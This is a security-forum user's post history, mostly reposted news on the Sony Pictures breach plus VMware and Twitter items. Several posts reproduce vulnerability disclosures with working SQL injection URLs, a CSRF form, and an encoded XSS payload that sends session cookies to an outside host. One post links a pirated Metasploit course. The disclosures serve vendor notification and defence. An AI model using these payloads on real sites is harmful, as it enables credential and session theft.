Aerosol

Active Members
  • Posts: 3453
  • Days Won: 22

Everything posted by Aerosol

  1. I want it too, please.
  2. Stop coming here to ask for programs like that, YOU WON'T FIND THEM and YOU WON'T GET THEM. Everyone's after cracked stuff...
  3. It could be MAGIC, IT COULD BE, but let's be serious, we don't believe in that anymore. Look at my eyes
  4. He fought so that we could live today, and he was forgotten all too easily... SHAME, Romania.
  5. Aerosol

    Personal details

    1. Yes 4. SURE 5. Yes 6. possibly
  6. They have to spam too, right? At least he chose to spam with women.
  7. Aerosol

    Hello

    Cheers, and welcome.
  8. Brothers, you can be the cleanest person alive; if they want you down, that's where you end up, they find a few bits of dirt and get you into trouble. Nothing has changed, the militia stayed the same, it's just called the police now; it's like in the old days and it will only get worse.
  9. The security breach suffered by Sony Pictures Entertainment last month appears to have leaked far more personal information than previously believed, revealing the US Social Security numbers of more than 47,000 celebrities, freelancers, and current and former Sony employees. An analysis of 33,000 leaked Sony Pictures documents by data security software firm Identity Finder showed that the leaked files included the personal information, salaries and home addresses for employees and freelancers who worked at the studio. Some of the celebrities include Sylvester Stallone, director Judd Apatow and Australian actress Rebel Wilson, according to the Wall Street Journal, which first reported on the analysis. Other data identified as leaked to file-sharing networks after the breach include contracts, termination dates, termination reason, and other sensitive information, nearly all of which was stored in Microsoft Excel files without password protection, said Identity Finder CEO Todd Feinman. Sony Pictures representatives did not respond to a request for comment. The leak highlights the risk posed to large companies and organizations that store customer and employee information on computers attached to the Internet, Feinman said. "This is a common theme of corporations today," Feinman told CNET, ticking off a list of recent security breach victims including Target, Home Depot and PF Changs. "They think they are protected by firewalls and perimeter security, but the border is becoming blurred, and attacks get through." Identity Finder said it discovered in the files more than 1.1 million Social Security numbers, the US system for tracking a person's tax and social welfare, but that many were duplicates. Sony Entertainment co-chair Amy Pascal's SSN was found in 104 separate locations, while Sony Entertainment CEO Michael Lynton's was found in 93 files. 
The discovery of multiple copies of data this sensitive on multiple employees' computers or multiple times on a single employee's computer is unusual and dramatically raises a company's security risk, Feinman said. "When you have multiple copies of this data, you are giving hackers multiple opportunities to steal sensitive information when they get through," he said. "If Sony had reduced its sensitive data footprint by reducing the number of copies of data and reducing the number of employees with access to the data, we would have seen zero or only one file." The revelation amplifies the damage caused by the hack, which forced the film and TV arm of Japanese tech and media conglomerate Sony to shut down its network for more than a week. A hacking group calling itself Guardians of Peace claimed last week to have obtained Sony Pictures' internal data, including its "secrets," and said it would release the data to the public if its demands were not met, according to reports. It is unclear what the hacker group demanded. Following this declaration, packs of files allegedly belonging to Sony Pictures found their way online. Data including passwords, Outlook mailboxes, personal employee data and copies of passports belonging to both actors and crews working on film projects have been released. Several days later, Sony Pictures films not yet officially released were leaked online, including the movies "Still Alice," "Annie," "Mr. Turner" and "To Write Love On Her Arms." Since the November 24 attack on Sony's network, investigators have been working to determine who was behind the hack. Sony is working with FireEye's Mandiant forensic team to investigate the breach, along with the FBI, which issued a warning earlier this week that hackers are using malware to launch destructive attacks against businesses in the US. The company is said to suspect that hackers working on behalf of North Korea were behind the attack, according to Recode. 
The site speculated that the attack may be in response to Sony's forthcoming film "The Interview," a comedy due to be released next month starring Seth Rogen and James Franco as TV journalists who become embroiled in a plot to assassinate North Korean leader Kim Jong-Un. Source
  10. It's Friday! By later this afternoon you'll be working at half-pace and contemplating weekend fun. Unless you run VMware's vCenter control freak, because Virtzilla has just revealed a nasty cross-site scripting flaw in the product. “VMware vCenter Server Appliance (vCSA) contains a vulnerability that may allow for Cross Site Scripting. Exploitation of this vulnerability in vCenter Server requires tricking a user to click on a malicious link or to open a malicious web page while they are logged in into vCenter,” says VMware's advisory, issued late on Thursday US time. Another newly-identified issue, one of six revealed here, means “vCenter Server does not properly validate the presented certificate when establishing a connection to a CIM Server residing on an ESXi host.” That makes Man-in-the-middle attacks against the CIM service possible. Virtzilla's other patches look less worrying as they address small issues and third-party code on which VMware products depend. The good news is that while there are patches coming for some of the problems, the first two can be sorted with updates to vCenter Server. Only vCenter 5.1 needs the update for the XSS bug, but all versions from 5.0 to 5.5 need attention for the certificate mess. Rushed update implementations aren't any fun, but if VMware says your production systems need them – on Friday – who are you to disagree? Source
  11. Still, bro, we're talking about a major company, how can you keep all your passwords in a file named "PASSWORD"? I mean, come on, it's like keeping a banner on your site saying "the password is 1234".
  12. It's been a rough week for Sony execs (million-dollar salaries notwithstanding). And things are only going to get worse. Which would almost be enough to make you feel bad for the poor schmucks in IT—that is, until you realize that they hid their most sensitive password data under the label "Passwords." Go ahead and slam your head against something hard. We'll wait. The second trove of data snuck out sometime yesterday, and it didn't take long for Buzzfeed to stumble upon the Facebook, MySpace (an ancient form of Facebook), YouTube, and Twitter "usernames and passwords for major motion picture social accounts." Likely due to the fact that they were saved in a huge file called "Password." Which contained even more passwords called things like "Facebook login password." So they would know that that was the password. Because who needs encryption or security or common sense or even the vaguest attempt at grade-school level online safety. Yep, "Password" should do just fine. Maybe stick a "1" on the end. That'll throw 'em off. Of course and unfortunately, it shouldn't really be a surprise that humans are lazy and unimaginative and just generally the worst when it comes to protecting our precious online data. And yet—goddammit, Sony IT. You had one job. [Fusion, Buzzfeed] Source
  13. Vulnerability title: SQL Injection in PBBoard CMS
    CVE: CVE-2014-9215
    CMS: PBBoard
    Vendor: Power bulletin board - http://www.pbboard.info/
    Product: http://sourceforge.net/projects/pbboard/files/PBBoard_v3.0.1/PBBoard_v3.0.1.zip/download
    Affected version: Version 3.0.1 (updated on 13/09/2014) and before.
    Fixed version: Version 3.0.1 (updated on 28/11/2014)
    Google dork: intext:Powered By PBBoard
    Reported by: Tran Dinh Tien - tien.d.tran@itas.vn
    Credits to ITAS Team - www.itas.vn

    :: DESCRIPTION ::
    Multiple SQL injection vulnerabilities have been found and confirmed within the software as an anonymous user. A successful attack could allow an anonymous attacker to access information such as usernames and password hashes that are stored in the database. The following URLs and parameters have been confirmed to suffer from SQL injection.

    :: DETAILS ::
    Attack vector

    Link 1:

        POST /index.php?page=register&checkemail=1 HTTP/1.1
        Host: target.org
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
        Accept: */*
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-Requested-With: XMLHttpRequest
        Referer: http://target.org/index.php?page=register&index=1&agree=1
        Content-Length: 29
        Cookie: PowerBB_lastvisit=1417086736; PHPSESSID=j0f7fuju2tu2ip7jrlgq6m56k4
        Connection: keep-alive
        Pragma: no-cache
        Cache-Control: no-cache

        email=<SQL Injection Here>&ajax=1

    Link 2:

        POST /index.php?page=forget&start=1 HTTP/1.1
        Host: target.org
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        Referer: http://target.org/index.php?page=forget&index=1
        Cookie: PowerBB_lastvisit=1417086736; PHPSESSID=j0f7fuju2tu2ip7jrlgq6m56k4
        Connection: keep-alive
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 52

        code=0ae4e&email=<SQL Injection Here>&submit_forget=Save

    Link 3:

        POST /index.php?page=forget&send_active_code=1 HTTP/1.1
        Host: target.org
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        Referer: http://target.org/index.php?page=forget&active_member=1&send_active_code=1
        Cookie: PowerBB_lastvisit=1417086736; PHPSESSID=j0f7fuju2tu2ip7jrlgq6m56k4
        Connection: keep-alive
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 57

        code=13709&email=<SQL Injection Here>&submit_active_code=Save

    :: CODE DETAIL ::
    - Vulnerable parameter: email
    - Vulnerable file: includes/functions.class.php
    - Vulnerable function: CheckEmail($email)
    - Vulnerable code (the character class allows a single quote, so the value passes validation and reaches the query):

        function CheckEmail($email)
        {
            return preg_match('#^[a-z0-9.!\#$%&\'*+-/=?^_`{|}~]+@([0-9.]+|([^\s\'"<>@,;]+\.+[a-z]{2,6}))$#si', $email) ? true : false;
        }

    - Fix code:

        function CheckEmail($email)
        {
            // First, we check that there's one @ symbol, and that the lengths are right
            if (!preg_match("/^[^@]{1,64}@[^@]{1,255}$/", $email)) {
                // Email invalid because wrong number of characters in one section, or wrong number of @ symbols.
                return false;
            }
            if (@strstr($email, '/')) {
                return false;
            }
            // Split it into sections to make life easier
            $email_array = explode("@", $email);
            $local_array = explode(".", $email_array[0]);
            for ($i = 0; $i < sizeof($local_array); $i++) {
                if (!preg_match("/^(([A-Za-z0-9!#$%&'*+\/=?^_`{|}~-][A-Za-z0-9!#$%&'*+\/=?^_`{|}~\.-]{0,63})|(\"[^(\\|\")]{0,62}\"))$/", $local_array[$i])) {
                    return false;
                }
            }
            if (!preg_match("/^\[?[0-9\.]+\]?$/", $email_array[1])) {
                // Check if domain is IP. If not, it should be valid domain name
                $domain_array = explode(".", $email_array[1]);
                if (sizeof($domain_array) < 2) {
                    return false; // Not enough parts to domain
                }
                for ($i = 0; $i < sizeof($domain_array); $i++) {
                    if (!preg_match("/^(([A-Za-z0-9][A-Za-z0-9-]{0,61}[A-Za-z0-9])|([A-Za-z0-9]+))$/", $domain_array[$i])) {
                        return false;
                    }
                }
            }
            return true;
        }

    :: SOLUTION ::
    Version 3.0.1 (updated on 28/11/2014)

    :: DISCLOSURE ::
    - 11/27/2014: Inform the vendor
    - 11/28/2014: Vendor confirmed
    - 11/28/2014: Vendor releases patch
    - 12/01/2014: ITAS Team publishes information

    :: COPYRIGHT ::
    Copyright (c) ITAS CORP 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of ITAS CORP ([url]www.itas.vn[/url]).

    :: REFERENCE ::
    - [url]http://www.itas.vn/news/ITAS-Team-discovered-SQL-Injection-in-PBBoard-CMS-68.html[/url]
    - [url]https://www.youtube.com/watch?v=AQiGvH5xrJg[/url]

    Source
  14. Here source
    Exploit Title: Google Document Embedder 2.5.16 mysql_real_escape_string bypass SQL Injection
    Date: 2014-12-03
    Exploit Author: Securely (Yoo Hee man)
    Plugin: google-document-embedder
    Fixed version: N/A
    Software Link: https://downloads.wordpress.org/plugin/google-document-embedder.2.5.16.zip

    1. Detail
    - Google Document Embedder v2.5.14 has an SQL injection vulnerability.
    - Plugin v2.5.16 was patched against that SQL injection by calling the mysql_real_escape_string() function.
    - But mysql_real_escape_string() can be bypassed here.
    - Vulnerable file: /google-document-embedder/~view.php

    ~view.php, lines 50-59:

        // get profile
        if ( isset( $_GET['gpid'] ) ) {
            // mysql_real_escape_string() only escapes quote and control characters;
            // gpid is later used unquoted in a numeric comparison, so the escaping is bypassed
            $gpid = mysql_real_escape_string( $_GET['gpid'] );
            if ( $profile = gde_get_profile( $gpid ) ) {
                $tb  = $profile['tb_flags'];
                $vw  = $profile['vw_flags'];
                $bg  = $profile['vw_bgcolor'];
                $css = $profile['vw_css'];
            }
        }

    ~view.php, lines 373-385:

        function gde_get_profile( $id ) {
            global $wpdb;
            $table = $wpdb->prefix . 'gde_profiles';

            // $id is interpolated into the query without quotes, so no quote character is needed to inject
            $profile = $wpdb->get_results( "SELECT * FROM $table WHERE profile_id = $id", ARRAY_A );
            $profile = unserialize($profile[0]['profile_data']);

            if ( is_array($profile) ) {
                return $profile;
            } else {
                return false;
            }
        }

    2. POC

        http://target/wp-content/plugins/google-document-embedder/~view.php?embedded=1&gpid=0%20UNION%20SELECT%201,%202,%203,%20CONCAT(CAST(CHAR(97,%2058,%2049,%2058,%20123,%20115,%2058,%2054,%2058,%2034,%20118,%20119,%2095,%2099,%20115,%20115,%2034,%2059,%20115,%2058)%20as%20CHAR),%20LENGTH(user_login),%20CAST(CHAR(58,%2034)%20as%20CHAR),%20user_login,%20CAST(CHAR(34,%2059,%20125)%20as%20CHAR))%20FROM%20wp_users%20WHERE%20ID=1

    3. Solution: Not patched

    4. Discovered By: Securely (Yoo Hee man) God2zuzu@naver.com
  15. Proof of concept code that demonstrates an ASLR bypass of PIE-compiled 64-bit Linux. Download
  16. PS4, clearly.
  17. On November 24 the world found out that Sony Pictures Entertainment was hacked and had disabled its entire corporate network, including locations that spanned Culver City, New York, and overseas. This breach has very few analogues in history, outside of the Snowden documents, to any other type of breach on record. The combined corporate intellectual property, financial and legal information, contact databases and health records, passwords and encryption keys for Sony Pictures Entertainment can’t be compared to a breach of a retailer’s email or credit card database. Home Depot said that 53 million email addresses were swiped in its recent data breach, where 56 million credit card accounts were also compromised. But in the case of Sony’s compromise, individual files can be spreadsheets with multiple records each. Some of the 38 million (known) files exfiltrated in this carefully planned attack are entire databases. This is comparative to source code being leaked. Unpublished scripts for movies, contract negotiations, NDA’s (thousands are listed), secret terms for payment schemes, the very information Sony uses to keep its entire company relevant, are in the stolen files. The benefits to Sony Pictures Entertainment competitors — Universal, Warner, Disney — in terms of competitive intel, is priceless. The hacking crew taking claim for popping one of the world’s largest film and entertainment companies identified themselves as #GOP (“Guardians of Peace”). News of the compromise emerged when a friend of a Sony employee posted to Reddit an image seen by anyone trying to log in on Sony Entertainment employee computers Monday morning. The image loaded onto every Sony Pictures employee’s computer when anyone attempted to log in was a very cheesy, grinning, sinister skeleton that threatened Sony, saying that unless GOP’s requests were met, GOP would release all of Sony’s ‘secrets’ to the world. 
After reporting the story, security column Salted Hash received a second image in which GOP threatened to release all of Sony’s data if any attempt was made to find GOP. Sony Pictures spokeswoman Jean Guerin said in a brief statement that the network was experiencing “a system disruption” and that technicians are “working diligently to resolve”. That Monday evening, GOP followed through by publishing a gigantic text file that listed what GOP said was every file in its possession: approximately 38 million file names. What’s named in that file list should have been enough to make everyone sit down and shut up about whether or not this hack was serious, or real. Salted Hash reported, “GOP says they’ve accessed private key files; source code files (CPP), password files (including passwords for Oracle and SQL databases), inventory lists for hardware and other assets, production outlines and templates, as well as production schedules and notes.” The file hit Reddit, and commenters noted they’d found over 9,000 passport scans listed in the file (including Angelina Jolie, Daniel Craig and Cameron Diaz). There are over 3,800 files named ‘password.’ If you’ve ever worked with, or even tangentially for, Sony Pictures Entertainment, this crew and anyone who gets ahold of these files have all of your personal information, your private information, and anything else Sony touched. There are filenames listing over 8,000 non-disclosure agreements (NDA’s), and over 6,000 files named MPAA. There are files with Pirate Bay in the title, as well as MEGA (Megaupload). Some file names are specific, like the ‘MPAA piracy project lunch receipt’ filename. Financials on pirated media losses dating back as far as 2006. One Redditor found the file for his Imageworks letter of resignation, dating back to 2005. Basically, if you’ve ever had a tangle with Sony Pictures, or Sony Entertainment ever thought about putting you in its legal crosshairs you’re in there, too. 
GOP left an interesting clue in its communication with media outlets after this release; this hacking crew appears to welcome press inquiries, though we can only hope the journos emailing GOP have half a clue about operational security. We may very well find out exactly what ‘Lena’ means. Monday night’s massive file list includes filenames of security audits and reports, and documentation of penetration tests performed by external companies. No doubt, in those files would be any recommendations made to SPE on its information and physical security practices. Sony only hired its first CISO in 2011, after the PlayStation Network was massively hacked (former gov cyberdude Philip R. Reitinger, formerly DHS, Microsoft, DoD and DoJ). He left Sony to start a consulting company in 2014 — a company whose online presence died off right around the time Sony filled his position by hiring from within, promoting its own director of security engineering, John Scimone, just last September. On November 30 Sony hired security firm FireEye’s Mandiant for incident response (and the FBI’s participation in an investigation became official). Hiring Mandiant is smart, because they’re the most popular girls in school when it comes to incident response, if not also well-known for scary OMG-the-APTs-are-coming dire warning research papers. But bringing in Mandiant is also disheartening — in light of the fact that SPE never really got its act together to hire and retain IT security staff. Currently, Sony infosec job listings sit unfilled on job boards, some over 30 days old, others since June. Also that weekend, Salted Hash reported GOP had “published sales and contract data from Sony Pictures Television, taken after the group compromised the entertainment giant’s network last week. 
The 894MB archive contains thousands of items, covering a period between 2008 and 2012.” Partial Release GOP published its second big weapon on Monday, December 1: A massive ‘partial release‘ of multiple compressed files containing more files, posted to Pastebin, several torrent sites and Reddit (among other websites). There’s no doubt that its contents will severely impact Sony Pictures Entertainment and its employees (and contractors) indefinitely — but reporting on the gravity and severity of this release has been curiously eclipsed by a rumor. On November 28, Re/code pulled a Zoolander-does-infosec-reporting move when the silver spoon tech media outlet claimed an insider told them “Sony and outside security consultants are actively exploring the theory that the hack may have been carried out by third parties operating out of China on North Korea’s behalf.” (Mandiant was announced as Sony’s incident response team November 30.) This unsubstantiated claim was picked up and reported at face value in headlines by Forbes, NPR, Guardian, NBC, ABC, CBS and many more. But the rumor was angrily blasted as irresponsible and unlikely by many in the infosec communities. The data drop is huge: 25GB’s — compressed. No one has yet reported the full size of all told in the release, which is supposedly a fraction of what GOP is holding. Needless to say, the drop contains piles and piles of Sony IP. The employee handbook. Leave of absence records. Salaries and financials, and a plethora of sensitive internal documentation. It also contains employee and contractor records, social security number files, a listing of over 30,000 HR documents, criminal background checks, even employee badge photos. For these employees, this is unbelievably awful. They are no longer safe, and they can expect the hardships of identity theft to screw up their lives for some time to come, and the lives of their families. 
We can only hope Sony tells its employees how much personal risk they currently face. This release has been publicly accessible for two days, and while the first Pastebin page was removed, the page’s Google Cache was shared widely — it was on Reddit, for example. GOP also emailed a 1.15GB subset of the files to its media correspondents, additionally publishing a list of what it sent to press on Pastebin. This data dump is just starting to be combed over and unpacked by media, online forums, and anyone else who gets their hands on it. GOP wrote on Pastebin that the large data dump is, And it’s in the hands of people who have more files like this, and who named that file’s password ‘diesony123’. The same day this file hit the torrent sites, Sony Pictures told Hollywood media site Deadline that its networks were back online in an exclusive statement, which Sony tastelessly combined with a plug for one of its upcoming films. So, how exactly do you steal an amount of data so big it’s comparative in size to all the books in the U.S. Library of Congress? This is a heist, plain and simple — but this was no simple plan. Exfiltrating ‘tens of terabytes’ takes planning. GOP has told media it had an insider working on this heist for a year, and I think we have every reason to believe this. If Sony Pictures Entertainment made a movie about this attack, we’d all think it was the usual made up Hollywood ‘cyberwar’ fantasy… and ridicule it like we do the TV show “Scorpion.” Source
  18. @CristianRoflmao There are only 3 steps:
  19. I used it, thanks.
  20. Man, you are incredibly... YOU DIDN'T CRACK ANY PASSWORD, it clearly says it isn't secured (it has no password). Until now you were getting in from VirtualBox, now you get in with a live CD (even you don't know anymore how much you've lied), and for God's sake it's KALI LINUX, not Linux Kali... Stop posting nonsense, all you're doing is making a fool of yourself. Think twice before you post something.
  21. @Bratuleanu123 stop going off topic, Bratuleanu Hacker Anonymous ))) you have a Linux Kali wallpaper, ha ha ha ha ha, what's with this picture? o.O the one the arrow is pointing at has NO password...
  22. Aerosol

    Udemy

    Udemy - Metasploit Extreme on Kali Linux
    English | .MP4 | Audio: aac, 44100 Hz, stereo | Video: h264, yuv420p, 642x360, 30.00 fps | 347 MB
    Download
    Pass: onevatan.com
  23. Product: WordPress plugin cm-download-manager
    Plugin page: [url]https://wordpress.org/plugins/cm-download-manager/[/url]
    Vendor: CreativeMindsSolutions [url]http://cminds.com/[/url]
    Vulnerability Type: CWE-79: Cross-site scripting
    Vulnerable Versions: 2.0.6 and below
    Fixed Version: 2.0.7
    Solution Status: Fixed by Vendor
    Vendor Notification: 2014-11-27
    Public Disclosure: 2014-12-02
    CVE Reference: N/A. Only assigned for CSRF
    Criticality: Low

    Vulnerability details: CM Download Manager plugin for WordPress contains a flaw that allows a stored cross-site scripting (XSS) attack. This flaw exists because the /wp-admin/admin.php script does not validate input to the 'addons_title' POST parameter before returning it to users. This allows an authenticated remote attacker to create a specially crafted request that would execute arbitrary script code in a user's browser session within the trust relationship between their browser and the server.

    Root cause: The software incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to authenticated users.

    Proof-of-concept: Insert the following code into the CM Downloads -> Settings -> "Downloads listing title" field, combined with the CSRF attack below.

        <script>var foo = String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 62, 110, 101, 119, 32, 73, 109, 97, 103, 101, 40, 41, 46, 115, 114, 99, 61, 34, 104, 116, 116, 112, 58, 47, 47, 98, 117, 103, 115, 46, 102, 105, 47, 99, 111, 111, 107, 105, 101, 46, 112, 104, 112, 63, 105, 100, 61, 34, 43, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 59, 60, 47, 115, 99, 114, 105, 112, 116, 62);document.write(foo);</script>

    ---------------

    Product: WordPress plugin cm-download-manager
    Plugin page: [url]https://wordpress.org/plugins/cm-download-manager/[/url]
    Vendor: CreativeMindsSolutions [url]http://cminds.com/[/url]
    Vulnerability Type: CWE-352: Cross-Site Request Forgery
    Vulnerable Versions: 2.0.6 and below
    Fixed Version: 2.0.7
    Solution Status: Fixed by Vendor
    Vendor Notification: 2014-11-27
    Public Disclosure: 2014-12-02
    CVE Reference: CVE-2014-9129
    Criticality: Low

    Vulnerability details: CM Download Manager plugin for WordPress contains a flaw on the CMDM_admin_settings page, as HTTP requests to /wp-admin/admin.php do not require multiple steps, explicit confirmation, or a unique token when performing sensitive actions. By tricking an authenticated user into following a specially crafted link, a context-dependent attacker can perform a CSRF attack causing the victim to insert and execute arbitrary script code.

    Root cause: The web application does not sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request.

    Proof-of-concept:

        <html><body><h3>https://example.org/wp-admin/admin.php?page=CMDM_admin_settings</h3>
        <form id="f1" method="POST" action="https://example.com/wp-admin/admin.php?page=CMDM_admin_settings">
        <table><input type="text" name="addons_title" value="XSS"></table></form>
        <script type="text/javascript">document.getElementById("f1").submit();</script>
        </body></html>

    Notes: Other pages and/or parameters are also possibly insecure (not tested). Suggested to do a proper security audit of their software. Vendor did not mention the security fix or CVE in the ChangeLog even though it was discussed several times. References below.

    Cross-site scripting:
    - [url=http://cwe.mitre.org/data/definitions/79.html]CWE - CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (2.8)[/url]
    - [url]https://scapsync.com/cwe/CWE-79[/url]
    - [url]https://en.wikipedia.org/wiki/Cross-site_scripting[/url]

    Cross-Site Request Forgery:
    - [url=http://cwe.mitre.org/data/definitions/352.html]CWE - CWE-352: Cross-Site Request Forgery (CSRF) (2.8)[/url]
    - [url]https://scapsync.com/cwe/CWE-352[/url]
    - [url]https://en.wikipedia.org/wiki/Cross-site_request_forgery[/url]

    --
    Henri Salo

    Source
  24. The FBI has warned that hackers have used malware to launch destructive attacks against businesses in the United States, following a devastating attack on the networks of Sony Pictures Entertainment. In a five-page confidential "flash" warning sent to businesses late Monday and seen by Reuters, the FBI provided technical details about the malware, but did not mention the corporate victim by name. According to the advisory, the malware is particularly violent -- overwriting data on hard drives to make them little more than bricks while also closing down networks. While it is likely the malware in question is linked to the Sony hack -- considering the timing of the issued warning -- an FBI spokesman declined to comment on the advisory. If this malware was used in the Sony security breach, the recovery process is likely to be costly and time consuming. Last week, reports emerged that noted Sony Pictures' websites and a number of Twitter feeds had been temporarily taken over. At the same time, employees of Sony's entertainment arm logged in to their systems to discover a message left by a hacking group -- or an individual -- which identified themselves as "#GOP" -- Guardians of Peace. The message left on Sony Pictures' internal network made demands of the company, promising to release "secrets" if the demands were not met. Following this declaration, packs of files allegedly belonging to Sony Pictures found their way online. Data including passwords, Outlook mailboxes, personal employee data and copies of passports belonging to both actors and crews working on film projects have been released. Several days later, Sony Pictures films not yet officially released were leaked, including the titles "Fury," "Still Alice," "Annie," "Mr. Turner" and "To Write Love On Her Arms." According to reports, Sony Pictures has been forced to bring in FireEye's Mandiant forensic team to investigate the breach and to act as clean-up crew. 
The FBI is also investigating the cyberattack. A Sony spokesperson said the "theft of Sony Pictures Entertainment content is a criminal matter, and we are working closely with law enforcement to address it." As reports tentatively linked the cyberattack against Sony Pictures to the release of a film about North Korea's leader Kim Jong-un, the country's officials responded in a rather cryptic manner. Speaking to the BBC, when asked whether North Korea was responsible for the attack, a spokesman for the North Korean government said "Wait and see." The film in question, "The Interview," is about two reporters who are enlisted by the CIA to assassinate Kim Jong-un. Earlier this year, North Korea complained about the film to the United Nations and branded the movie an "undisguised sponsoring of terrorism." This story originally appeared at ZDNet under the headline "FBI warns of 'destructive' malware following Sony hack." Source
  25. Twitter has announced changes making it easier for users to block offensive content and malicious tweets. The firm said that the changes, which will come in a staged rollout, are part of a number of updates designed to simplify the user experience, and prevent "in-product harassment", or trolling. The move could also provide some confidence in Twitter as it courts the enterprise market. Twitter said in a blog post that the feature could be used by victims or witnesses of abusive posts. "In our continuing effort to make your Twitter experience safer, we're enhancing our in-product harassment reporting and making improvements to ‘Block'," said Twitter director of user safety, Shreyas Doshi. "These enhancements similarly improve the reporting process for those who observe abuse but aren't receiving it directly. "And to enable faster response times, we've made the first of several behind-the-scenes improvements to the tools and processes that help us review reported tweets and accounts." A new section of the Settings page allows Twitter users to review and manage the accounts that they have blocked. Doshi added that the blocked accounts will not be able to view the user's profile. Twitter said that it has also made some back-end changes which will allow it to deal with reports of abuse and harassment more quickly. "These enhancements similarly improve the reporting process for those who observe abuse but aren't receiving it directly," Doshi said. The update is starting with a small subset of users, and will be rolled out more widely over time. Caroline Criado-Perez, a British journalist and feminism campaigner who faced abuse on Twitter last year after pushing to have Jane Austen’s face on the £10 note, has praised Twitter's latest move. Source